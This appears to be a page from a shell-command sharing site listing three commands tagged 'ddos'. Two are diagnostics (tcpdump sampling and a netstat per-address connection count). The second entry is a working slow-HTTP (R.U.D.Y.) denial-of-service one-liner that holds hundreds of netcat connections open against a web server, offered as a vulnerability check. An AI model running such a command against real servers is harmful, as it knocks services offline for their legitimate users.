Commands tagged ddos (3)

  • Sometimes it is useful to have just a general picture of "what is taking all the bandwidth here". Running this command will limit tcpdump to a few packets (instead of flooding your terminal endlessly) and will provide a small, but sometimes sufficient, sample to determine what is going on. Useful to quickly diagnose DOS attacks.


    0
    tcpdump -i eth0 -n | head
    anarcat · 2011-12-06 18:34:51 0
  • Check if your HTTP server is vulnerable to a very effective variant of the slow HTTP attack called R.U.D.Y (R-U-Dead-Yet?). This command tries to keep many connections to the target web server and hold them open as long as possible. An affected server will exhaust its maximum concurrent connection pool and deny additional connection attempts from legitimate clients. Use it with caution!


    -1
    for i in `seq 300`; do ( ( echo -e "POST / HTTP/1.1\nHost: vhost.domain\nContent-length: 100000\n\n"; for j in `seq 600`; do echo $j=$j\&; sleep 5; done ) | nc vhost.domain 80 & ); done
    elceef · 2015-04-15 14:02:55 0
  • Useful to check DDoS attacks on servers.


    -2
    netstat -alpn | grep :80 | awk '{print $4}' |awk -F: '{print $(NF-1)}' |sort | uniq -c | sort -n
    nitins · 2009-02-19 04:59:32 0
